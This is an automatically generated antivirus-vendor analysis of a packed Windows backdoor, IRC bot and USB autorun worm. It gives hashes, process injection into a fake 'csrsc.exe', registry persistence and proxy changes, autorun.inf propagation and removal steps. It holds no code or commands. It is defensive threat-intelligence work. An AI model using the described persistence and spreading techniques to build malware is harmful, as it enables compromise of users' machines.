Win32.Virtob.Gen.12_03f087c558
Backdoor.Win32.IRCBot.jwy (Kaspersky), Win32.Virtob.Gen.12 (B) (Emsisoft), Win32.Virtob.Gen.12 (AdAware), Backdoor.Win32.PcClient.FD, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Backdoor, Worm, WormAutorun, IRCBot
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: 03f087c5586068f01ac35e2d92f3700a
SHA1: a44cd1a0935aa2a4ff6a0d7c03fac675bd557b40
SHA256: 4aeffd206abfbd143ea972069d05dfebbe1de119ceb101c8e993bbc45d1061ab
SSDeep: 768:RuCkdC2D5z4oWV0OCAB4Rld8Inv48rXyKDQm6Aix3bNLUAllM:Rjkdjl8WK4RP84vnrXyKGx3FBs
Size: 52736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1987-01-30 06:38:08
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Backdoor: malware that enables remote control of the victim's machine.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script executes the Backdoor's file once a user opens the drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via an IRC channel. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:356
rundll32.exe:1004
dumprep.exe:1352
dumprep.exe:1504
The Backdoor injects its code into the following process(es):
csrsc.exe:212
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:356 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\csrsc.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process csrsc.exe:212 makes changes in the file system.
The Backdoor deletes the following file(s):
C:\%original file name%.exe (0 bytes)
Registry activity
The process %original file name%.exe:356 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 76 32 1B 1B D1 47 C5 F2 A8 94 21 0F 8A A1 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions]
"onstared" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process rundll32.exe:1004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 D8 94 86 FD 99 FE B2 71 42 91 BF 40 C1 18 58"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\%WinDir%]
"explorer.exe" = "EnableNXShowUI"
[HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatibility]
"AppCompatCache" = "EF BE AD DE 60 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"explorer.exe" = "Windows Explorer"
The process csrsc.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 07 5A CD 20 F2 14 7C 38 BD 6B 78 C1 1E 0A 8B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Control]
"WaitToKillServiceTimeout" = "7000"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions]
"onstared"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process dumprep.exe:1352 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 B3 49 D7 C4 AB 30 87 90 C9 CC E7 2B EE 28 DF"
The process dumprep.exe:1504 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 5D 68 80 13 B8 82 76 19 50 EA 39 0C 59 C2 6B"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script executes the Backdoor's file once a user opens the drive's folder in Windows Explorer.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 495616 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 499712 | 36864 | 30720 | 5.3904 | c304340bc3163329c23454b344de2155 |
| UPX2 | 536576 | 20992 | 20992 | 4.3414 | 0e115b10c48b01660765ecab17099096 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Backdoor connects to the servers at the following location(s):
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:356
rundll32.exe:1004
dumprep.exe:1352
dumprep.exe:1504
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\csrsc.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.